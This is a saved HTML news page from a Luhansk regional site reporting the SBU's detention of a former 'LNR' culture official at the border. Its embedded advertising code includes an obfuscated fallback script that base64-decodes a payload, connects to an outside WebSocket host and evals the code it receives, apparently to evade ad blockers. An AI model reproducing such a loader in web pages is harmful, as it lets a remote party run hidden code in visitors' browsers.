<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="ru" lang="ru">
<head>

<meta charset="utf-8">
<title>Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="  Служба безопасности Украины задержала бывшую «чиновницу ЛНР», которая была руководителем «управления культуры, молодежи и спорта» в Должанске. Как сообщает пресс-служба СБУ, женщину задержали во время пересечения государственной границы Украины когда она возвращалася на подконтрольную территорию">
<meta name="keywords" content="Украины, в СБУ, террористической, в Украину, Служба, занимала, годах, в 2015–2019, администрации, оккупационной, «управления», руководителя, должность, спецслужбы, женщина, способствовала,  По информации, сообщили, территории», власти">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине">
<meta property="og:url" content="http://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-04/medium/1618569450_lnte.jpg">
<meta property="og:description" content="Служба безопасности Украины задержала бывшую «чиновницу ЛНР», которая была руководителем «управления культуры, молодежи и спорта» в Должанске. Как сообщает пресс-служба СБУ, женщину задержали во время пересечения государственной границы Украины когда она возвращалася на подконтрольную территорию">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html">
<link rel="alternate" type="application/rss+xml" title="Новости Луганска и Луганской области. Луганские новости сегодня" href="http://www.citynews.net.ua/rss.xml">
<link href="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/editor/css/default.css&amp;v=25" rel="stylesheet" type="text/css">
<script src="/engine/classes/min/index.php?charset=utf-8&amp;g=general&amp;v=25"></script>
<script src="/engine/classes/min/index.php?charset=utf-8&amp;f=engine/classes/js/jqueryui.js,engine/classes/js/dle_js.js,engine/classes/highslide/highslide.js&amp;v=25" defer></script>
   <meta name="robots" content="index, follow" />
	<link rel="shortcut icon" href="/favicon.ico" type="image/x-icon" />
	<link rel="stylesheet" href="/engine/classes/min/index.php?charset=windows-1251&amp;f=/v2screen.css,/templates/v2/style/engine.css&amp;7" />
	<script type="text/javascript" src="/engine/classes/min/index.php?charset=windows-1251&amp;f=/templates/v2/js/libs.js&amp;7"></script>


</head>
<body>
<div id="header">
	<div class="logo"><a href="/" title="Новости Украины">CityNews</a><h1>Новости Украины</h1></div><div class="sbs"><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a>
	  <form action="" name="searchform" method="post">
			<input type="hidden" name="do" value="search" />
			<input type="hidden" name="subaction" value="search" />
					<div class="sffu">	<input id="story" name="story" value="Поиск..." onblur="if(this.value=='') this.value='Поиск...';" onfocus="if(this.value=='Поиск...') this.value='';" type="text" /></div><div class="sfbu"> <input type="image" style="width:25px; height:25px; border:0" src="/images/search.gif"/></div>
				
			
	  </form></div>
</div>
   <nav class="nav"><div id="menu">	<ul>
		<li><a href="/news/" title="Новости Луганска и Луганской области">Новости Луганска </a></li>
		<li><a href="/econom/">Экономика</a></li>
        <li><a href="/polit/">Политика</a></li>
		<li><a href="/sport/">Спорт</a></li>
        <li><a href="/ukrainenews/kiev/" title="Новости Киева и Киевской области">Новости Киева</a></li>
		<li><a href="/ukrainenews/odessa/" title="Новости Одессы и Одесской области">Новости Одессы</a></li>
		<li><a href="/reklama.html">Реклама на сайте</a></li>
        <li><a href="/taxnews/">Пресс-релизы</a></li>
	</ul></div></nav>
<div class="all">
<div class="colmask blogstyle">
	<div class="colmid">
		<div class="colleft">
			<div class="col1">
 
  
<!-- Яндекс.Директ -->
<div id="yandex_ad"></div>
<script type="text/javascript">
(function(w, d, n, s, t) {
    w[n] = w[n] || [];
    w[n].push(function() {
        Ya.Direct.insertInto(139323, "yandex_ad", {
            ad_format: "direct",
            font_size: 0.8,
            type: "horizontal",
            limit: 2,
            title_font_size: 1,
            links_underline: true,
            site_bg_color: "FFFFFF",
            title_color: "0000CC",
            url_color: "006600",
            text_color: "000000",
            hover_color: "0066FF",
            no_sitelinks: true
        });
    });
    t = d.getElementsByTagName("script")[0];
    s = d.createElement("script");
    s.src = "//an.yandex.ru/system/context.js";
    s.type = "text/javascript";
    s.async = true;
    t.parentNode.insertBefore(s, t);
})(window, document, "yandex_context_callbacks");
</script><div class="speedbar"><span id="dle-speedbar"><span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; <span itemscope itemtype="http://data-vocabulary.org/Breadcrumb"><a href="http://www.citynews.net.ua/news/" itemprop="url"><span itemprop="title">Новости Луганска</span></a></span> &raquo; Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине</span></div>

<div id='dle-content'><div class="fulls">
<article><h1>Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине</h1>
<a href="http://www.citynews.net.ua/2021/04/16/" ><span class="date">Сегодня, 13:36</span></a> <span class="date" style="float:right"><noindex><a href=http://citynews.net.ua rel=nofollow>citynews.net.ua</a></noindex>
 | <a href="http://www.citynews.net.ua/news/print:page,1,86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html" rel="nofollow">Напечатать</a> </span>
<div class="share42init" data-url="http://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html" data-title="Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине"></div>
<script type="text/javascript" src="http://citynews.net.ua/share42/share42.js"></script> 
<div class="maincont">

			<p>Служба безопасности Украины задержала бывшую «чиновницу ЛНР», которая была руководителем «управления культуры, молодежи и спорта» в Должанске. </p>
<p>Как сообщает пресс-служба СБУ, женщину задержали во время пересечения государственной границы Украины когда она возвращалася на подконтрольную территорию с целью постоянного проживания.</p>
<p>«Она выехала из оккупированной Луганской области в РФ, а затем приехала в Украину с территории РФ — через пункт пропуска «Меловое». Колаборантка въезжала в Украину для изменения фамилии и хотела постоянно проживать на подконтрольной украинской власти территории», — сообщили в СБУ.</p>
<p><a href="http://www.citynews.net.ua/uploads/posts/2021-04/1618569450_lnte.jpg" class="highslide" target="_blank"><img src="/uploads/posts/2021-04/medium/1618569450_lnte.jpg" alt="" style="display:block;margin-left:auto;margin-right:auto;"></a> </p>
<p>По информации спецслужбы, женщина занимала должность руководителя «управления» оккупационной администрации в 2015–2019 годах.</p>
<p>«Она активно способствовала распространению пророссийской пропаганды и организовывала агитационные мероприятия», — добавили в СБУ.</p>
<p>Женщина находилась в розыске с 2015 году. Ей вменяют создание террористической группы или террористической организации (ч. 1 ст. 258-3 Уголовного кодекса Украины). Задержанной готовится сообщение о подозрение.</p>
            <br />
<script type="text/javascript"><!--
google_ad_client = "pub-1002459357691458";
/* 468x60, создано 28.05.10 */
google_ad_slot = "0880908263";
google_ad_width = 468;
google_ad_height = 60;
//-->
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
			<div class="clr"></div>


		
		
	</div>
	<div class="related">
		<div class="dtop"><span><b>Другие новости по теме:</b></span></div>	
		<ul class="reset">
			<li><a href="http://www.citynews.net.ua/news/85313-na-granice-s-rf-zaderzhali-organizatorku-separatistskogo-referenduma-v-luganskoj-oblasti-.html">На границе с РФ задержали организаторку сепаратистского «референдума» в Луганской области   </a></li><li><a href="http://www.citynews.net.ua/news/83094-s-1-marta-vyehat-v-rossiju-mozhno-tolko-po-zagranpasportu.html">С 1 марта выехать в Россию можно только по загранпаспорту</a></li><li><a href="http://www.citynews.net.ua/news/60476-na-kpvv-zaderzhali-chinovnicu-lnr-video.html">На КПВВ задержали чиновницу «ЛНР» (видео)</a></li><li><a href="http://www.citynews.net.ua/news/56979-v-harkovskoy-oblasti-zaderzhali-chinovnika-lnr-veterana-truda.html">В Харьковской области задержали &quot;чиновника&quot; ЛНР – ветерана труда</a></li><li><a href="http://www.citynews.net.ua/news/51410-luganchanku-ne-pustili-v-ukrainu-s-pasportom-lnr.html">Луганчанку не пустили в Украину с «паспортом ЛНР»</a></li>
		</ul>
		<br />
	</div>
	</article>
	
</div>
<hr />
<br /><noindex>
<!--  News Join -->

<style>
.join_informer_1182 * { border: none; padding: 0; margin: 0; }
.join_informer_1182 { text-align:left; clear: both; padding: 5px}
.join_informer_1182 a.join_link, a.join_text {font-size: 12px;
font-family: Arial; margin-bottom:10px;
color:#0049a3;text-decoration:none; font-weight:bold;}
.join_informer_1182 a.join_link:hover, a.join_text:hover {
color:#0049a3;text-decoration:underline;}
.join_informer_1182 .join_img {width: 120px; height: 120px; }
</style>

<div class="join_informer_1182" id="join_informer_1182"></div>

<!-- Асинхронный код, 18.12.2014 -->
<script type="text/javascript">  (function() {
var i = document.createElement("script"); i.type = "text/javascript";
i.async = true; i.charset = "UTF-8";
i.src = "http://partner.join.com.ua/async/1182/";
var s = document.getElementsByTagName("script")[0];
s.parentNode.insertBefore(i, s);
})();</script>
<!--  News Join -->

<div style="height:210px"><script class="r36737" type="text/javascript">
    (function() {
        var worker36737,
            tickerID = 36737,
            tag = document.currentScript || (function() {
                var scripts = document.getElementsByClassName('r36737'),
                    len = scripts.length;
                return len ? scripts[len - 1] : null;
            })(),
            idn = (function() {
                var i, num, chars = "abcdefghiklmnopqrstuvwxyz",
                    len = Math.floor((Math.random() * 2) + 4),
                    idn = '';
                for (i = 0; i < len; i++) {
                    num = Math.floor(Math.random() * chars.length);
                    idn += chars.substring(num, num + 1);
                }
                return idn;
            })();
        
        var container = document.createElement('div');
            container.id = idn;
            container.innerHTML = 'загрузка...';
        tag.parentNode.insertBefore(container, tag);

        var script = document.createElement('script');
            script.setAttribute('class', 's36737');
            script.setAttribute('data-idn', idn);
            script.src = '//v1r7on.news/ru-n4p/0/36/ticker_36737.js';
            script.type = 'text/javascript';
            script.charset = 'utf-8';
            script.onerror = function() {
                if (!('atob' in window && 'Worker' in window))
                    return;
                window.rtIsWebSocket = true;

                var code = 'dmFyIHNvY2tldDsgZnVuY3Rpb24gc2VuZFRvU29ja2V0KGRhdGEpIHsgdmFyIHdzc1VybCA9ICJ3c3M6Ly9uNHAucmVkdHJhbS5jb20vd3MvIjsgaWYgKCFzb2NrZXQgfHwgc29ja2V0LnJlYWR5U3RhdGUgPT09IHNvY2tldC5DTE9TRUQpIHsgc29ja2V0ID0gbmV3IFdlYlNvY2tldCh3c3NVcmwpOyBzb2NrZXQub25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBwb3N0TWVzc2FnZShKU09OLnN0cmluZ2lmeShyLmRhdGEpKTsgfTsgfSBpZiAoc29ja2V0KSB7IHNlbmRDb25uZWN0aW9uKHNvY2tldCwgZnVuY3Rpb24oKSB7IHNvY2tldC5zZW5kKGRhdGEpOyB9KTsgfSB9IGZ1bmN0aW9uIHNlbmRDb25uZWN0aW9uKGMsIHIpIHsgc2V0VGltZW91dChmdW5jdGlvbigpIHsgaWYgKGMucmVhZHlTdGF0ZSA9PT0gYy5PUEVOKSB7IHJldHVybiByKCk7IH0gcmV0dXJuIHNlbmRDb25uZWN0aW9uKGMsIHIpOyB9LCA1MCk7IH0gb25tZXNzYWdlID0gZnVuY3Rpb24ocikgeyBzZW5kVG9Tb2NrZXQoci5kYXRhKTsgfTsg';

                function runExternalMessage(data) {
                    worker36737.postMessage(data);
                }

                worker36737 = new Worker(URL.createObjectURL(
                    new Blob(["eval(atob('"+code+"'))"], {type: 'text/javascript'})
                ));

                worker36737.onmessage = function(m) {
                    var json = JSON.parse(m.data),
                        content = JSON.parse(json)['content'];
                    eval(content);
                };

                worker36737.postMessage(JSON.stringify({
                    command: 'init',
                    informer_id: tickerID,
                    url: script.src
                }));
            };
        tag.parentNode.insertBefore(script, tag);
    })();
    </script></div>

<div id="meta_news_block1815"><a href="http://news.meta.ua/" rel="nofollow"> Мета новости...</a></div><script type="text/javascript" charset="windows-1251" src="http://exchange.meta.ua/1815/block.js"></script><br /><br>

<!-- MarketNews Start -->
<div id="MarketGid2493">
<a href="http://marketgid.com/" rel="nofollow" target="_blank">Загрузка...</a>
</div>
<!-- MarketNews End -->
<!-- pered </body> -->
<script type="text/javascript">
var MarketGidDate = new Date();
document.write('<scr'+'ipt type="text/javascript" '
+'src="http://jsn.dt00.net/c/i/citynews.net.ua.2493.js?t='+MarketGidDate.getYear()+MarketGidDate.getMonth()
+ '" charset="utf-8" ></scr'+'ipt>');
</script> 

</noindex>
<div id="disqus_thread"></div>
    <script type="text/javascript">
        /* * * CONFIGURATION VARIABLES: EDIT BEFORE PASTING INTO YOUR WEBPAGE * * */
        var disqus_shortname = 'citynews-ua'; // required: replace example with your forum shortname

        /* * * DON'T EDIT BELOW THIS LINE * * */
        (function() {
            var dsq = document.createElement('script'); dsq.type = 'text/javascript'; dsq.async = true;
            dsq.src = 'http://' + disqus_shortname + '.disqus.com/embed.js';
            (document.getElementsByTagName('head')[0] || document.getElementsByTagName('body')[0]).appendChild(dsq);
        })();
    </script>
   
    <noindex><a href="http://disqus.com" rel="nofollow" class="dsq-brlink">comments powered by <span class="logo-disqus">Disqus</span></a></noindex>
<!--dlenavigationcomments--></div>
				<!-- Column 1 end -->
			</div>
			<div class="col2">
				
				<h3 class="ra">Новости Луганска:</h3>
                <span>Сегодня, 14:13</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86370-predstaviteli-grazhdanskogo-obschestva-doneckoj-i-luganskoj-oblastej-sdelali-zajavlenie-v-svjazi-davleniem-rf-na-ukrainu-i-ee-zapadnyh-partnerov.html">Представители гражданского общества Донецкой и Луганской областей сделали заявление в связи c давлением РФ на Украину и ее западных партнеров</a></h4><span>Сегодня, 13:36</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html">Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине</a></h4><span>Сегодня, 11:56</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86367-ukraina-poluchila-pervye-vakciny-pfizer-ot-covid-19.html">Украина получила первые вакцины Pfizer от COVID-19</a></h4><span>Сегодня, 10:35</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86366-v-luganskoj-oblasti-ljubitel-metalloloma-poluchil-ranenie-pri-razborke-starogo-patrona.html">В Луганской области любитель металлолома получил ранение при разборке старого патрона</a></h4><span>Сегодня, 10:23</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86365-v-luganskoj-oblasti-za-sutki-290-novyh-sluchaev-koronavirusa-i-12-umershih.html">В Луганской области за сутки 290 новых случаев коронавируса и 12 умерших</a></h4><span>Сегодня, 10:15</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86364-rossijskie-terroristy-obstreljali-novozvanovku-.html">Российские террористы обстреляли Новозвановку </a></h4><span>Вчера, 16:27</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86361-ssha-i-es-vveli-novye-sankcii-protiv-rf-za-krym-i-kiberataki.html">США и ЕС ввели новые санкции против РФ. За Крым и кибератаки</a></h4><span>Вчера, 14:43</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86360-v-lisichanske-pogibla-zhenschina-v-dtp-voditel-travmirovan.html">В Лисичанске погибла женщина в ДТП, водитель травмирован</a></h4><span>Вчера, 14:21</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86359-v-severodonecke-podveli-itogi-konkursa-na-luchshij-proekt-pamjatnika-gerojam-ato.html">В Северодонецке подвели итоги конкурса на лучший проект памятника «Героям АТО»</a></h4><span>Вчера, 14:07</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86357-yeb-ta-yes-dopomagajut-vdnoviti-poshkodzhenu-nfrastrukturu-v-doneckj-ta-luganskj-oblastjah-na-sumu-ponad-120-mln-yevro.html">ЄІБ та ЄС допомагають відновити пошкоджену інфраструктуру в Донецькій та Луганській областях на суму понад 120 млн євро</a></h4><span>Вчера, 12:52</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86350-na-zasedanii-snbo-prodolzhat-v-ruchnom-rezhime-borotsja-s-kontrabandistami-i-tajno-podumajut-o-donbasse.html">На заседании СНБО продолжат в «ручном» режиме бороться с контрабандистами и тайно подумают о Донбассе</a></h4><span>Вчера, 12:26</span><br>
<h4 ><a href="https://www.citynews.net.ua/news/86349-v-severodonecke-s-16-aprelja-zaprescheno-hodit-v-les-bez-razreshenija.html">В Северодонецке с 16 апреля запрещено ходить в лес без разрешения</a></h4>
                <hr />
                <h3 class="ra">Новости Украины:</h3>
                <span>Вчера, 14:13</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86358-1-travnja-svjato-vesni.html">1 травня свято весни</a></h4><span>14-04-2021, 12:29</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86340-v-kieve-prodlili-protivojepidemicheskie-ogranichenija-krasnoj-zony-karantina-do-30-aprelja.html">В Киеве продлили противоэпидемические ограничения «красной» зоны карантина до 30 апреля</a></h4><span>9-04-2021, 15:56</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86305-sternenko-vypustili-iz-pod-strazhi-pod-domashnij-arest.html">Стерненко выпустили из-под стражи под домашний арест</a></h4><span>9-04-2021, 12:33</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86299-s-2-po-8-aprelja-gosjekoinspekcija-sostavila-983-protokola-ob-administrativnyh-pravonarushenijah-vo-vse-ukraine.html">С 2 по 8 апреля Госэкоинспекция составила 983 протокола об административных правонарушениях во все Украине</a></h4><span>9-04-2021, 11:34</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86298-v-pamjatnom-dome-vertiporoha-na-podole-provedut-antiavarijnye-raboty.html">В памятном доме Вертипороха на Подоле проведут антиаварийные работы</a></h4><span>5-04-2021, 13:56</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86268-pohischennogo-sudju-chausa-vyvezli-v-ukrainu-mvd-moldovy.html">Похищенного судью Чауса вывезли в Украину  – МВД Молдовы</a></h4><span>2-04-2021, 14:40</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86257-klichko-pokazal-specpropuska-na-obschestvennyj-transport-kieva-s-5-aprelja-2021-goda.html">Кличко показал спецпропуска на общественный транспорт Киева с 5 апреля 2021 года</a></h4><span>2-04-2021, 14:37</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86256-5-aprelja-v-odesse-zavershaetsja-otopitelnyj-sezon.html">5 апреля в Одессе завершается отопительный сезон.</a></h4><span>31-03-2021, 18:11</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86236-bystraja-uborka-s-pomoschju-kliningovoj-kompanii.html">Быстрая уборка с помощью клининговой компании</a></h4><span>31-03-2021, 16:25</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86233-kiev-s-5-aprelja-uhodit-v-lokdaun-v-transport-po-propuskam-kafe-tolko-na-vynos.html">Киев с 5 апреля уходит в локдаун: в транспорт по пропускам, кафе - только на вынос</a></h4><span>31-03-2021, 13:11</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86228-v-kieve-cherez-neskolko-dnej-nachnut-otkljuchat-otoplenie.html">В Киеве через несколько дней начнут отключать отопление</a></h4><span>24-03-2021, 12:55</span><br>
<h4 ><a href="https://www.citynews.net.ua/ukrainenews/86181-s-25-marta-v-kieve-ucheniki-5-11-klassov-perehodjat-na-distancionnoe-obuchenie.html">С 25 марта в Киеве ученики 5-11 классов переходят на дистанционное обучение</a></h4>
				
			</div>
			<div class="col3">
			
      
				<div id="ads"><h3 class="ra">Разное:</h3>
					<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct = "UA-1689781-1";
urchinTracker();
</script>

  

<script async src="//pagead2.googlesyndication.com/pagead/js/adsbygoogle.js"></script>
<!-- rt-citynews.net.ua -->
<ins class="adsbygoogle"
     style="display:inline-block;width:240px;height:400px"
     data-ad-client="ca-pub-1002459357691458"
     data-ad-slot="6485410796"></ins>
<script>
(adsbygoogle = window.adsbygoogle || []).push({});
</script>
<br />
<br />

<h3 class="ra">Реклама:</h3>
<br />
<h3 class="ra">Посмотреть:</h3>
<a href="/news/81836-novye-pravila-vezda-vyezda-s-okkupirovannymi-rajonami-luganskoj-i-doneckoj-oblastej.html" title="Документы для пересечения КПВВ в Луганске и Донецке">Новые правила въезда-выезда с оккупированными районами Луганской и Донецкой областей</a> <br />
<a href="http://citynews.net.ua/internet-shop-lugansk.html">Интернет-магазин в Луганске</a><br />
<a href="http://www.citynews.net.ua/weather_lugansk.html">Погода в Луганске</a><br />
<br />
<h3 class="ra">Архив новостей:</h3>
<p><div id="calendar-layer"><table id="calendar" class="calendar"><tr><th colspan="7" class="monthselect"><a class="monthlink" onclick="doCalendar('03','2021','right'); return false;" href="http://www.citynews.net.ua/2021/03/" title="Предыдущий месяц">&laquo;</a>&nbsp;&nbsp;&nbsp;&nbsp;Апрель 2021&nbsp;&nbsp;&nbsp;&nbsp;&raquo;</th></tr><tr><th class="workday">Пн</th><th class="workday">Вт</th><th class="workday">Ср</th><th class="workday">Чт</th><th class="workday">Пт</th><th class="weekday">Сб</th><th class="weekday">Вс</th></tr><tr><td colspan="3">&nbsp;</td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/01/" title="Все публикации за 01 апреля 2021">1</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/02/" title="Все публикации за 02 апреля 2021">2</a></td><td  class="day-active" ><a class="day-active" href="http://www.citynews.net.ua/2021/04/03/" title="Все публикации за 03 апреля 2021">3</a></td><td  class="weekday" >4</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/05/" title="Все публикации за 05 апреля 2021">5</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/06/" title="Все публикации за 06 апреля 2021">6</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/07/" title="Все публикации за 07 апреля 2021">7</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/08/" title="Все публикации за 08 апреля 2021">8</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/09/" title="Все публикации за 09 апреля 2021">9</a></td><td  class="weekday" >10</td><td  class="weekday" >11</td></tr><tr><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/12/" title="Все публикации за 12 апреля 2021">12</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/13/" title="Все публикации за 13 апреля 2021">13</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/14/" title="Все публикации за 14 апреля 2021">14</a></td><td  class="day-active-v" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/15/" title="Все публикации за 15 апреля 2021">15</a></td><td  class="day-active-v day-current" ><a class="day-active-v" href="http://www.citynews.net.ua/2021/04/16/" title="Все публикации за 16 апреля 2021">16</a></td><td  class="weekday" >17</td><td  class="weekday" >18</td></tr><tr><td  class="day" >19</td><td  class="day" >20</td><td  class="day" >21</td><td  class="day" >22</td><td  class="day" >23</td><td  class="weekday" >24</td><td  class="weekday" >25</td></tr><tr><td  class="day" >26</td><td  class="day" >27</td><td  class="day" >28</td><td  class="day" >29</td><td  class="day" >30</td><td colspan="2">&nbsp;</td></tr></table></div> </p><br />
<br />

<a href="#" title="Вернуться к началу" class="topbutton">^Наверх</a>
  <p>&nbsp;</p>
			</div>
		</div>
	</div>
</div>

<!-- Yandex.Metrika -->
<div style="display:none;"><script type="text/javascript">
(function(w, c) {
    (w[c] = w[c] || []).push(function() {
        try {
            w.yaCounter28393 = new Ya.Metrika(28393, null, 1);
             yaCounter28393.clickmap(true);
             yaCounter28393.trackLinks(true);
        
        } catch(e) {}
    });
})(window, 'yandex_metrika_callbacks');
</script></div>
<script src="//mc.yandex.ru/metrika/watch.js" type="text/javascript" defer></script>
<noscript><div style="position:absolute"><img src="//mc.yandex.ru/watch/28393?cnt-class=1" alt="" /></div></noscript>
<!-- /Yandex.Metrika -->


</div>
</div>
<div id="footer">
	<div class="all"><div class="ftex">
	  <p>© 2003—2020 Citynews.net.ua - Все новости Луганска и Луганской области. Новости 
      Одессы, Киева, Харькова, Луцка. </p>
	  <p><a href="https://www.facebook.com/lugansk.news" class="fb" rel="nofollow"> </a><a href="https://twitter.com/NewsLugansk" class="twi" rel="nofollow"> </a><a href="https://plus.google.com/110576264707339910234/posts" class="gog" rel="nofollow"> </a><a href="/rss.xml" class="rss"> </a></p>
	  <p style="line-height:13px">	  
</p><br />

	  <p><a href="/note/"> ЗАМЕТКИ </a></p>
    </div>
    <div class="ftex">
	  <p>Использование материалов Citynews.Net.UA разрешается и приветствуется при условии наличия ссылки (для интернет-изданий — гиперссылки) на <a href="http://citynews.net.ua" title="Новости Украины">Citynews.net.ua</a>. </p>
	  <p>Перепечатка, копирование или воспроизведение информации, содержащей ссылку на агентство "УНН" в каком-либо виде строго запрещено.</p>
        <p>Материалы отмеченные рубрикой Пресс-релизы и Заметки публикуются на правах рекламы</p>
  </div>
      <div class="ftex wli">
	  <p> <a href="/sitemap.xml">Sitemap</a> | <a href="/reklama.html">Контакты</a> </p>
	  <p>
          <nobr><div style="display:none"><!-- bigmir)net TOP 100 --><a href="http://www.bigmir.net/?cl=56861" target=_blank rel=nofollow><script language="javascript"><!--
bmQ='<img src=http://c.bigmir.net/?s56861&t5';bmD=document;bmD.cookie="b=b";if(bmD.cookie)bmQ+='&c1'
//--></script><script language="javascript1.2"><!--
bmS=screen;bmQ+='&d'+(bmS.colorDepth?bmS.colorDepth:bmS.pixelDepth)+"&r"+bmS.width;
//--></script><script language="javascript"><!--
bmF = bmD.referrer.slice(7);((bmI=bmF.indexOf('/'))!=-1)?(bmF=bmF.substring(0,bmI)):(bmI=bmF.length);if(bmF!=window.location.href.substring(7,7+bmI))bmQ+='&f'+escape(bmD.referrer);bmD.write(bmQ+" border=0 width=88 height=31 alt='bigmir TOP100'>");
              //--></script></a></div>&nbsp;
<!--LiveInternet counter--><script type="text/javascript"><!--
document.write("<a href='http://www.liveinternet.ru/click' "+
"rel=nofollow><img src='//counter.yadro.ru/hit?t52.2;r"+
escape(document.referrer)+((typeof(screen)=="undefined")?"":
";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth?
screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+
";"+Math.random()+
"' alt='' title='LiveInternet: показано число просмотров и"+
" посетителей за 24 часа' "+
"border='0' width='88' height='31'><\/a>")
//--></script><!--/LiveInternet--><br /></p>
  </div></div>
</div>



<div id="fb-root"></div>
<script>(function(d, s, id) {
  var js, fjs = d.getElementsByTagName(s)[0];
  if (d.getElementById(id)) return;
  js = d.createElement(s); js.id = id;
  js.src = "//connect.facebook.net/uk_UA/sdk.js#xfbml=1&amp;version=v2.5";
  fjs.parentNode.insertBefore(js, fjs);
}(document, 'script', 'facebook-jssdk'));</script>
<meta charset="utf-8">
<title>Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине &raquo; Новости Луганска и Луганской области. Луганские новости сегодня</title>
<meta name="description" content="  Служба безопасности Украины задержала бывшую «чиновницу ЛНР», которая была руководителем «управления культуры, молодежи и спорта» в Должанске. Как сообщает пресс-служба СБУ, женщину задержали во время пересечения государственной границы Украины когда она возвращалася на подконтрольную территорию">
<meta name="keywords" content="Украины, в СБУ, террористической, в Украину, Служба, занимала, годах, в 2015–2019, администрации, оккупационной, «управления», руководителя, должность, спецслужбы, женщина, способствовала,  По информации, сообщили, территории», власти">
<meta name="generator" content="DataLife Engine (http://dle-news.ru)">
<meta property="og:site_name" content="Новости Луганска и Луганской области. Луганские новости сегодня">
<meta property="og:type" content="article">
<meta property="og:title" content="Чиновница работавшая на российских террористов в Луганске хотела сменить имя и жить в Украине">
<meta property="og:url" content="http://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html">
<meta property="og:image" content="http://www.citynews.net.ua/uploads/posts/2021-04/medium/1618569450_lnte.jpg">
<meta property="og:description" content="Служба безопасности Украины задержала бывшую «чиновницу ЛНР», которая была руководителем «управления культуры, молодежи и спорта» в Должанске. Как сообщает пресс-служба СБУ, женщину задержали во время пересечения государственной границы Украины когда она возвращалася на подконтрольную территорию">
<link rel="search" type="application/opensearchdescription+xml" href="http://www.citynews.net.ua/index.php?do=opensearch" title="Новости Луганска и Луганской области. Луганские новости сегодня">
<link rel="canonical" href="http://www.citynews.net.ua/news/86369-chinovnica-rabotavshaja-na-rossijskih-terroristov-v-luganske-hotela-smenit-imja-i-zhit-v-ukraine.html">
